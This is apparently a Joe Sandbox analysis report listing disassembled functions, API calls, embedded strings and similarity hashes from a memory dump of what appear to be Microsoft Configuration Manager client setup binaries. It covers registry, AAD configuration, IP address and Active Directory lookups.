                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005B7265
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B72F2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B736A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B73BF
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B740E
                                                                                          Strings
                                                                                          • SOFTWARE\Microsoft\SMS\Operations Management\SMS Server Role\SMS Management Point, xrefs: 005B737E
                                                                                          • util.cpp, xrefs: 005B735A
                                                                                          • util.cpp, xrefs: 005B73FE
                                                                                          • regKey.GetString(L"Version", sVersion), xrefs: 005B7404
                                                                                          • util.cpp, xrefs: 005B73C7
                                                                                          • util.cpp, xrefs: 005B72FA
                                                                                          • regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), L"SOFTWARE\\Microsoft\\SMS\\Operations Management\\SMS Server Role\\SMS Man, xrefs: 005B73B5
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B72ED
                                                                                          • regKey.Close(), xrefs: 005B7360
                                                                                          • util.cpp, xrefs: 005B7372
                                                                                          • Version, xrefs: 005B73D2
                                                                                          • util.cpp, xrefs: 005B7416
                                                                                          • Software\Microsoft\SMS, xrefs: 005B72B5
                                                                                          • Full Version, xrefs: 005B7320
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B7365
                                                                                          • util.cpp, xrefs: 005B73AF
                                                                                          • util.cpp, xrefs: 005B72E2
                                                                                          • regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), L"Software\\Microsoft\\SMS", ulAccess), xrefs: 005B72E8
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B73BA
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B7409
                                                                                          • GetMPSiteVersion, xrefs: 005B7281
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch$CloseH_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$Full Version$GetMPSiteVersion$SOFTWARE\Microsoft\SMS\Operations Management\SMS Server Role\SMS Management Point$Software\Microsoft\SMS$Version$regKey.Close()$regKey.GetString(L"Version", sVersion)$regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), L"SOFTWARE\\Microsoft\\SMS\\Operations Management\\SMS Server Role\\SMS Man$regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), L"Software\\Microsoft\\SMS", ulAccess)$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 288237175-2477930119
                                                                                          • Opcode ID: 55ab44126180fb186dfc45261e1e980fc5ae2170ee661e14893061405c3aa3f5
                                                                                          • Instruction ID: e192f1abb3aff2834de415ad1b1d8ae74d20cd5267ad405dba46b79463ae9bee
                                                                                          • Opcode Fuzzy Hash: 55ab44126180fb186dfc45261e1e980fc5ae2170ee661e14893061405c3aa3f5
                                                                                          • Instruction Fuzzy Hash: 9541B331D8434AEACB10EBA0D91AFFE7E76AB95B10F1A1006F900773C1C7645A05D791
                                                                                          Function 0062C0D7 Relevance: 45.6, APIs: 5, Strings: 21, Instructions: 140threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0062C0DE
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F67E1: __EH_prolog3_catch.LIBCMT ref: 005F67E8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062C14F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062C1C0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062C217
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062C271
                                                                                          Strings
                                                                                          • AADAuthUrl, xrefs: 0062C235
                                                                                          • regKey.SetString(c_szClientAppId_RegValue, sClientAppId), xrefs: 0062C1B6
                                                                                          • ..\CcmToken.cpp, xrefs: 0062C261
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062C26C
                                                                                          • ..\CcmToken.cpp, xrefs: 0062C13F
                                                                                          • SOFTWARE\Microsoft\CCM\AADConfigs, xrefs: 0062C112
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062C1BB
                                                                                          • CcmUtilLib::UpdateAADOnboardingInfo, xrefs: 0062C0F3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062C212
                                                                                          • regKey.Create((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szAADConfigs_RegKey, ((((0x00020000L)) | (0x0002) | (0x0004)) & (~(0x00, xrefs: 0062C145
                                                                                          • ..\CcmToken.cpp, xrefs: 0062C279
                                                                                          • ..\CcmToken.cpp, xrefs: 0062C157
                                                                                          • ..\CcmToken.cpp, xrefs: 0062C1B0
                                                                                          • regKey.SetString(c_szResourceUri_RegValue, sAADResourceUri ), xrefs: 0062C20D
                                                                                          • ..\CcmToken.cpp, xrefs: 0062C1C8
                                                                                          • ClientAppId, xrefs: 0062C188
                                                                                          • ..\CcmToken.cpp, xrefs: 0062C21F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062C14A
                                                                                          • regKey.SetString(c_szAADAuthUrl_RegValue, sAADAuthUrl ), xrefs: 0062C267
                                                                                          • ResourceUri, xrefs: 0062C1DB
                                                                                          • ..\CcmToken.cpp, xrefs: 0062C207
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch$CloseH_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$..\CcmToken.cpp$AADAuthUrl$CcmUtilLib::UpdateAADOnboardingInfo$ClientAppId$ResourceUri$SOFTWARE\Microsoft\CCM\AADConfigs$regKey.Create((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szAADConfigs_RegKey, ((((0x00020000L)) | (0x0002) | (0x0004)) & (~(0x00$regKey.SetString(c_szAADAuthUrl_RegValue, sAADAuthUrl )$regKey.SetString(c_szClientAppId_RegValue, sClientAppId)$regKey.SetString(c_szResourceUri_RegValue, sAADResourceUri )
                                                                                          • API String ID: 288237175-2167063783
                                                                                          • Opcode ID: 932c93cebb4160b19f6ba33c2184229f3eda94bf5d41ae9d195b7b675cda4177
                                                                                          • Instruction ID: 3ccd6da77e4a537b19955706587a4082e1c6bf3246ac7f287653e440119044b7
                                                                                          • Opcode Fuzzy Hash: 932c93cebb4160b19f6ba33c2184229f3eda94bf5d41ae9d195b7b675cda4177
                                                                                          • Instruction Fuzzy Hash: 4441E3B1A81669EBDB10DB90DD0FFAE3F76AF51B20F14405DF9006B282C7685E05CBA1
                                                                                          Function 005FA2FE Relevance: 45.6, APIs: 9, Strings: 17, Instructions: 119threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005FA305
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FA34F
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,CCM::Core::ConvertAnsiToUnicode,00000014,005F4EEB,00000000,`)l,CCM::Utility::String::assign,00000034,005F4151,?,00000004), ref: 005FA388
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 005FA395
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FA3C7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FA40B
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,?,00000000,?,0058B3CC,?,?,?,?,?,00938B28,00000001), ref: 005FA430
                                                                                          • GetLastError.KERNEL32(?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000,?), ref: 005FA43E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005FA474
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$ByteCharErrorLastMultiWide$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(szUnicode.resize(nLength) == true) != 0$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$..\util.cpp$CCM::Core::ConvertAnsiToUnicode$MultiByteToWideChar(0, 0, pszAnsi, -1, szUnicode, nLength) > 0$nLength > 0$pszAnsi != 0
                                                                                          • API String ID: 2761146266-4271964131
                                                                                          • Opcode ID: ecdb570275258cedcd2d996516d1b95c92fc2c641f432bb50430cd2da8aa5fe5
                                                                                          • Instruction ID: 0c9e95ece739a7b41ffe2373a44cf3f687a99994725850abf4180d53813412a0
                                                                                          • Opcode Fuzzy Hash: ecdb570275258cedcd2d996516d1b95c92fc2c641f432bb50430cd2da8aa5fe5
                                                                                          • Instruction Fuzzy Hash: 12310BF1AC4359FAEB20ABA45D0AFBE7E65BF04B50F044101BF44B72D1C6AD9900D6A3
                                                                                          Function 006751D5 Relevance: 44.0, APIs: 6, Strings: 19, Instructions: 269threadmemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006751DC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0067525C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006752BC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0067532F
                                                                                          • CoTaskMemAlloc.OLE32(?,?,?,CcmUtilLib::CcmGetIPAddressInformation,00000050,00648A05,?,?,CCM::LocationServices::LSGetSubnetBoundaries,00000088,0064242A,?,00000000,00000000,000000FF,CCM::LocationServices::LSGetAssignedSiteFromAD), ref: 006753C6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006753FC
                                                                                          Strings
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 00675404
                                                                                          • Failed to retrieve IP subnet information (0x%08x)., xrefs: 00675515
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 0067533B
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006752AC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006752B7
                                                                                          • 0 != pdwLen, xrefs: 006752B2
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 0067531F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006753F7
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006752C8
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006753EC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00675257
                                                                                          • GetIPV4AddressInformation(vecIPV4Info), xrefs: 00675325
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0067532A
                                                                                          • 0 != ppInfo, xrefs: 00675252
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 00675268
                                                                                          • CcmUtilLib::CcmGetIPAddressInformation, xrefs: 00675214
                                                                                          • Failed to retrieve IPV6 address information., xrefs: 00675372
                                                                                          • (pSubnetInfo) != 0, xrefs: 006753F2
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 0067524C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$AllocH_prolog3_catchTask
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(pSubnetInfo) != 0$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$0 != pdwLen$0 != ppInfo$CcmUtilLib::CcmGetIPAddressInformation$Failed to retrieve IP subnet information (0x%08x).$Failed to retrieve IPV6 address information.$GetIPV4AddressInformation(vecIPV4Info)
                                                                                          • API String ID: 4068304276-78982985
                                                                                          • Opcode ID: 1a95ab5225ffbdb7f1b89181cea93045edc4673e753b0763ec76a02b62ebbd3e
                                                                                          • Instruction ID: 035f8519ea0598b4bd2044e2008051805832b02df427764212bf3474dd0e3af0
                                                                                          • Opcode Fuzzy Hash: 1a95ab5225ffbdb7f1b89181cea93045edc4673e753b0763ec76a02b62ebbd3e
                                                                                          • Instruction Fuzzy Hash: A8A19FB1D006589BDF01DFE8C849AEDBBB9BF59710F14809AE519FB382D7B45A01CB90
                                                                                          Function 00601163 Relevance: 42.1, APIs: 7, Strings: 17, Instructions: 134threadmemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0060116A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006011BD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060121B
                                                                                          • CoTaskMemAlloc.OLE32(00000000,00000017,?,?,CCM::Utility::ComString::assign,00000018,00674E15,?,00000000,000000FF), ref: 00601258
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00601291
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006012F6
                                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000017,?,00000000,00000000,00000200), ref: 00601336
                                                                                          Strings
                                                                                          • pos >= 0, xrefs: 00601211
                                                                                          • ..\ComString.cpp, xrefs: 00601227
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00601216
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060128C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006012F1
                                                                                          • pszUnicodeValue != 0, xrefs: 006011B3
                                                                                          • ..\ComString.cpp, xrefs: 006011C9
                                                                                          • ..\ComString.cpp, xrefs: 0060129D
                                                                                          • ..\ComString.cpp, xrefs: 0060120B
                                                                                          • StringCchCatNExW( pszNewValue, uLength + 1, pszUnicodeValue + pos, uLength, 0, 0, 0x00000200 ), xrefs: 006012EC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006011B8
                                                                                          • ..\ComString.cpp, xrefs: 00601302
                                                                                          • ..\ComString.cpp, xrefs: 006011AD
                                                                                          • ..\ComString.cpp, xrefs: 00601281
                                                                                          • ..\ComString.cpp, xrefs: 006012E6
                                                                                          • CCM::Utility::ComString::assign, xrefs: 0060117A
                                                                                          • (pszNewValue != 0) != 0, xrefs: 00601287
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Task$AllocFreeH_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(pszNewValue != 0) != 0$..\ComString.cpp$..\ComString.cpp$..\ComString.cpp$..\ComString.cpp$..\ComString.cpp$..\ComString.cpp$..\ComString.cpp$..\ComString.cpp$CCM::Utility::ComString::assign$StringCchCatNExW( pszNewValue, uLength + 1, pszUnicodeValue + pos, uLength, 0, 0, 0x00000200 )$pos >= 0$pszUnicodeValue != 0
                                                                                          • API String ID: 3351718187-4253535858
                                                                                          • Opcode ID: 116fd04f6fe86769554ff392c327777926e3aeac179001a5d373ab85f1dfad51
                                                                                          • Instruction ID: 45791aeff87357f6e9b30e55f0033975f7bd338616523699c5c84756a79e0425
                                                                                          • Opcode Fuzzy Hash: 116fd04f6fe86769554ff392c327777926e3aeac179001a5d373ab85f1dfad51
                                                                                          • Instruction Fuzzy Hash: 7041B4B1AC0315ABDB159FA18C46EAF7F66AF91B11F148049FB04AF3C1C7794A018BD5
                                                                                          Function 0064121F Relevance: 40.5, APIs: 7, Strings: 16, Instructions: 236threadcomCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00641226
                                                                                            • Part of subcall function 006092DC: __EH_prolog3.LIBCMT ref: 006092E3
                                                                                          • CoCreateInstance.OLE32(008DCE4C,00000000,00000017,00841544,?,00000000,000000FF,00000000,000000FF,00000000,000000FF,00000000,000000FF,CCM::LocationServices::LSGetADForestAndDomainName,00000034,00650D74), ref: 00641319
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00641349
                                                                                          • SysFreeString.OLEAUT32(?), ref: 00641380
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006413BE
                                                                                          • SysFreeString.OLEAUT32(?), ref: 006413D7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00641419
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • ..\lsad.cpp, xrefs: 00641339
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00641414
                                                                                          • spSystemInfo->get_ForestDNSName(&bstrForestName), xrefs: 006413B4
                                                                                          • ..\lsad.cpp, xrefs: 00641409
                                                                                          • spSystemInfo.CoCreateInstance( CLSID_ADSystemInfo ), xrefs: 0064133F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00641344
                                                                                          • LSGetADForestAndDomainName, xrefs: 006412A5
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006413B9
                                                                                          • CCM::LocationServices::LSGetADForestAndDomainName, xrefs: 00641269
                                                                                          • ..\lsad.cpp, xrefs: 00641425
                                                                                          • ..\lsad.cpp, xrefs: 006413CA
                                                                                          • spSystemInfo->get_DomainDNSName(&bstrDomainName), xrefs: 0064140F
                                                                                          • Unable to retrieve AD forest + domain membership. Error 0x%x, xrefs: 006414F4
                                                                                          • Current AD forest name is %s, domain name is %s, xrefs: 0064153B
                                                                                          • ..\lsad.cpp, xrefs: 006413AE
                                                                                          • ..\lsad.cpp, xrefs: 00641355
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$FreeString$CreateH_prolog3H_prolog3_catchInstance
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$CCM::LocationServices::LSGetADForestAndDomainName$Current AD forest name is %s, domain name is %s$LSGetADForestAndDomainName$Unable to retrieve AD forest + domain membership. Error 0x%x$spSystemInfo->get_DomainDNSName(&bstrDomainName)$spSystemInfo->get_ForestDNSName(&bstrForestName)$spSystemInfo.CoCreateInstance( CLSID_ADSystemInfo )
                                                                                          • API String ID: 1200325978-283225773
                                                                                          • Opcode ID: f9d902d634817d5f415b6180123c001defc695ac1792163d856790e302e0def7
                                                                                          • Instruction ID: 96bd7483c53d8212feaadc1d10bebc594ec3c20e7b20a23cbdd60f181d7c3c16
                                                                                          • Opcode Fuzzy Hash: f9d902d634817d5f415b6180123c001defc695ac1792163d856790e302e0def7
                                                                                          • Instruction Fuzzy Hash: BA91BD70940319ABDF11EF94C84ABEE7EB6BF92714F044149F650AB3C2C7B85A45CBA1
                                                                                          Function 0057A11D Relevance: 40.4, APIs: 5, Strings: 18, Instructions: 198threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0057A127
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 0059E344: __EH_prolog3_catch.LIBCMT ref: 0059E34B
                                                                                            • Part of subcall function 00587525: __EH_prolog3_catch_GS.LIBCMT ref: 0058752C
                                                                                            • Part of subcall function 00587525: GetCurrentThreadId.KERNEL32 ref: 005875C1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057A1EA
                                                                                            • Part of subcall function 00597526: __EH_prolog3_catch_GS.LIBCMT ref: 00597530
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057A29D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057A2F0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057A34F
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057A1E5
                                                                                          • DetermineApplicablePatches(sCachedMsi, m_sWorkingProductCode), xrefs: 0057A2E6
                                                                                          • ccmsetup.cpp, xrefs: 0057A357
                                                                                          • ccmsetup.cpp, xrefs: 0057A1DA
                                                                                          • ccmsetup.cpp, xrefs: 0057A2E0
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057A34A
                                                                                          • PrepareMsiProperties(InstallAction_Repair, sMsiProperties, sTemp, mapTemp), xrefs: 0057A345
                                                                                          • client.msi, xrefs: 0057A21B
                                                                                          • GetPackageInfo(sCachedMsi, m_sWorkingProductCode), xrefs: 0057A293
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057A298
                                                                                          • ccmsetup.cpp, xrefs: 0057A1F2
                                                                                          • ccmsetup.cpp, xrefs: 0057A33F
                                                                                          • ccmsetup.cpp, xrefs: 0057A28D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057A2EB
                                                                                          • ccmsetup.cpp, xrefs: 0057A2A5
                                                                                          • ccmsetup.cpp, xrefs: 0057A2F8
                                                                                          • GetCachedMsiPath(sPath), xrefs: 0057A1E0
                                                                                          • CcmSetup::ApplyDeltaPatchChanges, xrefs: 0057A18D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
